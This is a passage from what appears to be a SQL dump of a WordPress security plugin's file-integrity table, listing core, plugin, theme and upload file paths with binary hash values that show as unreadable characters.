wA���e','wp-includes/blocks/latest-posts/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o(;�3��-@m�\\��','�������U��}\0��\\Gh�y�1d���\ZE�','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�ڦ�_��R�\n','���_�F#6�u�R�l�G�-��[f�{�\'','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K��ɹ���jwD�x�','wp-content/plugins/wp-cerber/assets/flags/us.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��V�w\Z]�Ay��','���L�CI`�^�J4�=��0���C�C}�','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c TP�_�','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('K���No��;%i\0�X�?','wp-content/uploads/2016/11/roof-plate-960x150.jpg',0,'z(#���W�$F1�.8�','z(#���W�$F1�.8�','��i�h��r�����5�#�0a����]��q','',0,'?'),('K�bw��y��.�3�{¥','wp-content/plugins/wp-cerber/assets/flags/pk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����00�%��[.�','Gjۀ���H��$�׃��m\'�^ O�n���','',0,'?'),('K��o��2x2o','wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-complete-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N?C�;�h\0H��?ʀ_K','\\Z1��;��#��1�39��&��]Ay�T\'','',0,'?'),('K�ϥ�%:�{�Rj���X','wp-content/plugins/wordpress-seo/src/generators/schema/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������ia���aB','l\Z���*�xz\Z��&^&�A�_cŖo�YU��S.','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(a$�jg}�S5N�j�','�\\\"�>��v��A�(���K�m�ò.�[L��','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K�K+�2� aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��ԝ\"����;e�','��1�crk��-E���g�\'�N�!ɶ','',0,'?'),('L��5C�Z��z�','wp-content/plugins/wordpress-seo/src/builders/primary-term-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4yZ���c.P+�Rh','tve��+�p`X<3���\'�)m\r�h��8�$�|�','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�ױ���������','b�{��E&�>#���b\r�o��6���(%f�','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('L9P�X{���{�E���','wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-redirect-nopremium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cyZ����','����\ZY��ܿ���y]8��(Q��l','',0,'?'),('LC�g=��7���Ϸ��','wp-content/plugins/redirection/models/match.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5a�f�rl�P��. ��(','�0\0PX^��1���lU!s����k�0�)o� ��','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�>��&Q)�Fy�k','e�i�p��r9ݴZ\\�\\Q~`�?�7�=�R�','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�&��W�iDJ�@��','��<�C:�LJ?����l��}\rZL�l�VY�','',0,'?'),('Lu��>X���b���VG','wp-content/plugins/wordpress-seo/admin/views/workouts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��c~AK���l9��','*��ـ��u���,�-A�ʿaM���[y6��C','',0,'?'),('Lw+��$�4|�ns�w','wp-content/themes/twentynineteen/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��+�����zg��','@u� |-�\ZK\Zbk�^��R4hM�Ψ����','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('LzEk�R�BU�)Z\n�b','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/ParameterBag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��_U��T��F(�','��h��)�xD�40�l]��M��tL�%�:\r�r','',0,'?'),('L���V��o�}��x','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-pt_BR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q2Aۗ\nӢ��Q�','Ӛ�M�V+�*=3�g4�1�<���U0���','',0,'?'),('L��e�t\"pc( �e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('L����E��g���F9','wp-includes/blocks/post-featured-image/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�1������','W�ܕ��n�,^�(�i\'H����\n\Z=�\'','',0,'?'),('L�E+���<8^7�EP','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7ރ�礤�>s��','KN�ZE\"*}Ȩ+(K�ɧ;Y\rʙ4<PZ�\0','',0,'?'),('Lւ7z�Z�j�k��Hw','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��X�����TB�s#�','�E���e�X��+ސ���n2W[��Jvǎ','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M58�p9���_uCZ','D����-{A��>&u���%2 �h���L','',0,'?'),('L��df�i�X.���\\','wp-content/themes/vega/sample/images/recent-news-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f)��\rD�=ux�[Hl','N���q��<h���n��up���\\1��)v?Y�v','',0,'?'),('L�\r��Ȧ:��n�h\'','wp-content/plugins/akismet/_inc/akismet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�s��r�\n�c�J(','����ra�H�\n��}`�R��N��|���:G','',0,'?'),('L�*����M�5�\'�','wp-content/uploads/2019/05/automatic-gates-768x512.jpg',0,'��D�\na.��%��','��D�\na.��%��','�u�7+�\r/�eȻ`�8f�r#�a� ��ϕ{tЪ','',0,'?'),('L+q�V�;�h��Y�','wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���N:��\'�ʤ��ȹ','J��!�����XLl`�e��O��s�H����','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5Iה�g,)Z�YM�','�\\k��S�뚑�n wW�� �!�*�~�v��','',0,'?'),('L�֞+P�C��)~u�_','wp-content/plugins/wordpress-seo/admin/views/partial-notifications-errors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2K�AX�1�z��','��\\�[� e�_�]vT�Sʑж\\�H\r[','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('M]���}�w��-�!�','wp-content/plugins/wordpress-seo/src/generators/schema/website.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q5I:c��g�\'��9�','���|�mKG�ÕZaV\0f�,~ƻ�u���\rA�','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M1��/�n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iڼ͝��d��*�','U���`���ih~3�P��w�_���','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�^�7 <��E�5k/','\0[���($E�Rn�3��k�ׁ1����U���\r','',0,'?'),('MW� ���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MW��Q��;ci~8�','wp-content/plugins/wordpress-seo/admin/class-yoast-input-validation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��⢥!�\'�*��','u+㷸N�0䭶 �4˒�|G�]��P\ZD`�!�','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h �3|:Q9z���4Y1[�{^� $;�#�q��','',0,'?'),('M_��\0�M(�_�7�4��','wp-content/uploads/2016/11/roofs-150x150.jpg',0,'�y��bKП�2ӛў6D','�y��bKП�2ӛў6D',';�L稊��q�MGR1�@�� ���Vܳ','',0,'?'),('MmQ��%�9k1�!','wp-content/plugins/wordpress-seo/src/surfaces/helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jb4q���dj��C��','�xy�`�3�;JD�c[�5��ɒD����E\Z�Y','',0,'?'),('Mta{�\0�D��ϪV^�','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexation-action-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�X�N��','8�?�vjkuJ�T,Ur�A�N¢��<��E�','',0,'?'),('M{��a5;�� ;6��','wp-content/plugins/wordpress-seo/languages/wordpress-seo-uk.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�f]�,�\rZm��8','\0�� �M��Q�����eeP���Ũ��','',0,'?'),('M�[\Z�2hT� �K�','wp-content/plugins/wp-cerber/assets/flags/tr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<~Qk�dIr&��-!','�\"��i0�M��˩��VJc���]�3�\n��[','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#� !A֗�//x4��','gs�!�W�-.?�wh��N��K�It�{��|','',0,'?'),('M�Y�)1�/G^�q��0','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1-768x512.jpg',0,'��k?�GY2�_\' $�','��k?�GY2�_\' $�','p$�Τ�5<�����(�\0��.�Y,�ķ�qO','',0,'?'),('M��w�M�f�0�b\\�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�+>����*�A��ř�','����{��Z�>�1k||�}P���C�TC��A','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[�\\ ��\r�\0@\0','�CPD#3��=qO�n*�Ost%pen�6�','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N8���\Z{�@���','wp-content/languages/en_GB-1d17475f620f63a92e2c5d2681c51ee8.json',0,'T�a��rE��tƨ�','T�a��rE��tƨ�','y>�����ƭ�A�(PB��V��[L\0���e�N','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z��(C+�,M���U��W6','',0,'?'),('NR�ƨ<��#�t�X','wp-content/themes/vega/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z3�!�e-���Ersp','_P^�Q�3����W\Z˿k�G+�iw��ާ\Z','',0,'?'),('Ni�~ �`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('Nxa�߭�̿��(r�_','wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('N|�Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N����4Y���y�߷','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/af.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�sH�矮z�����','�64;�w�F�^�+Kd�:):1W�n�,u�\'4','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N�E\\���|���J�S�','wp-content/plugins/wordpress-seo/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3���a���i/In�<','.��,I!\\�T����W�4�l�� t�8�����Fh','',0,'?'),('N���lvT܆���EX�','wp-content/plugins/wordpress-seo/src/integrations/admin/social-templates-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�~��s̡�\"Q8�','W �\'�[/N�ʡ���S�U!�_L�r�5Χ#�','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�#{�0xp���F��','U;�{���Y+s�҉�ŋe�|���7���rY','',0,'?'),('N�UBy�a�� ��','wp-includes/blocks/columns/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ç+���U�z�ɄA','�6���M�)v�ݱ�J�^IS���#���Vt!+4','',0,'?'),('N��lI���V�,�Z�','wp-content/plugins/wp-cerber/assets/flags/hn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;Ҿ����:��','e��{9�[�۫�p��Nk83)t����$<5�','',0,'?'),('N��a��e]�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3de{�h��|@��ձ','��BX����V�AӋ6�4���/Mk��f�','',0,'?'),('O*�]�����m�ռ','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/RequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zu~��JU�א��9','�̈́P�Fm��D��N����ܪP,�q��H\r','',0,'?'),('O ��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a����j�>h����','�-щ&�^�N[��j�d2Lْ�S]�H��','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�tK���=���k\Z','!�ڎd�F5M�w�%�Y�Ė��2餒�9�\nQ','',0,'?'),('O77v�0�MO�d?��I','wp-content/uploads/2019/09/garden-1680802_960_720-350x220.jpg',0,'����Gv�j���`�E','����Gv�j���`�E','�\Z)v&��\r�9G��d��|@u�>�[5{�Z��','',0,'?'),('O =(�:��<� �1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('O!P�m���KP� �d��','wp-content/uploads/2019/08/business-training.jpg',0,'\rtĮ���mPjw}','\rtĮ���mPjw}','@��1�lZ�<��h[��ٚ\"��F�v��ᇅ','',0,'?'),('O\"��l�!n�M_��','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-react.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ւn4�HG�D�l�had','=Z��W�������$��3%�ϺOh��2�t�u*','',0,'?'),('O(��z�N�g�qbi9','wp-content/uploads/2019/05/automatic-gates-150x150.jpg',0,'HȆ�x/5펷�\r�','HȆ�x/5펷�\r�','��LyO�$���- \0���(�{q�mф�HTh','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O9����y�[��fa��b','wp-content/uploads/2016/11/kitchen-2486092_960_720-350x220.jpg',0,'����k�0�����','����k�0�����','`�1�h�!^t*�?\ZS�EF��QsǓL��j�','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('O@�[[���J\Z�N','wp-content/plugins/wordpress-seo/src/conditionals/should-index-links-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D��}��\"','�3�r�i�پ�I|]m5x��\\���$~��Qt','',0,'?'),('OJ�?�Cz�V�^2���1','wp-content/plugins/wp-cerber/assets/flags/mr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��Y��kF���@','���c���n�foaYd��M@�0O��DI\n��x','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3]_�E֡h��\Z�N�','-�6�U�2Ѧ��\Z�1����&�=�mh���(_','',0,'?'),('OT���;�h�FR|�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I�U`��t���',';�9�sM�lȴ[\ZZY��B�����{��Re','',0,'?'),('OX�3es�ު����','wp-content/uploads/2019/08/homeimprovements.jpg',0,'���_��[eȊ\nV5�','���_��[eȊ\nV5�','�F��������Bv�e�q%��\0XP��','',0,'?'),('Oj�sO�*B.�s���','wp-content/plugins/wordpress-seo/src/helpers/request-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$ʼaJl,�y�','���JoI�vl��ư�z\n(�Yn���!�#','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�6���E����','�>�\r忈����R[�>��Y��L Q\07U','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A����� wj�љ�9�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('O};e�9�7����V','wp-content/uploads/2019/08/roof-updraft-pre-smush-original.jpg',0,'M�(��D/���0��_�','M�(��D/���0��_�','���G;li2~��.6h���{^gGE��y2D��','',0,'?'),('O�潼m$��&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=�C���;��w^�X','�_\n�W����o�0w�����7��`=�r��','',0,'?'),('O�������a�+���','wp-content/plugins/wordpress-seo/admin/views/tool-import-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M��=��۶L\r\Z�','I���Gt�W�O�QWTQ�~]O�SEzS_+��=�','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɞ��WHv,j','�r����陖����B�B`�tp�����h~','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���J��z%p','�qG%`�3E�:j~^�\ZҌ��;,��','',0,'?'),('O��<���z^!Fc�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��׳Y�1�UQT&v','��-�����\\J���g�P���5','',0,'?'),('O��?�s�\ZK��?�','wp-content/plugins/wordpress-seo/admin/filters/class-cornerstone-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m7cڴd]N��CW��X','Vl�R�y�5�ɏ���}\'�5\Zۼ�%*�Q','',0,'?'),('O����y ��k b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�3���b�Q�.���','��\"DY������ t��B5�aK��1�','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#-���:#fﰕk8','fzʫ����W3�.OJ����JI��o�J٥�','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('Pgq䳮r>Q9~�o','wp-content/uploads/2019/08/Green-Energy-300x169.jpg',0,'D�pq�I����E<','D�pq�I����E<','�\Z��BX�xC^\0�9�Y DQĖ�~ .�/�z ','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('P8����4\\���z','wp-content/uploads/2021/08/home-improvements-350x220.jpg',0,'�U�/廹� 2�aQ�','�U�/廹� 2�aQ�','t77oLH8˷�ґ���@v:�f\n��V','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('P ���NtD��n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oP�%~�75jN��}a�','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$;�9H�S_��7���','��`���R���f!Rd�<����Q�� ��GIJ','',0,'?'),('P3h�C�1zo9V}','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c����Ʉ�aW�Oa','�5�\':�p�`���D;�(l%�1+�I��EA)jV','',0,'?'),('P73o� ��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('P@e�z|SG1-9�\'','wp-content/uploads/2019/08/Therapy-150x150.jpg',0,'�\r!\Z)�_S��','�\r!\Z)�_S��',')�b����n��+�~Ň�ٜ&�+ɮ[#l�','',0,'?'),('PE��E+\Z���9��C','wp-content/plugins/wordpress-seo/languages/yoast-components-id_ID.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�߁�=�&Ą+�\'{','�n��\ZO��4�#�4\ZnI�)��D�cV%�Ed','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('Pk�{S��:���߯�','wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��Rz�R��χ�r','�_���sM4o⯁9:���0F�X�6����d','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}�:T&��B�ܽ6,','��2��n,�/M�V��5��[~_��= 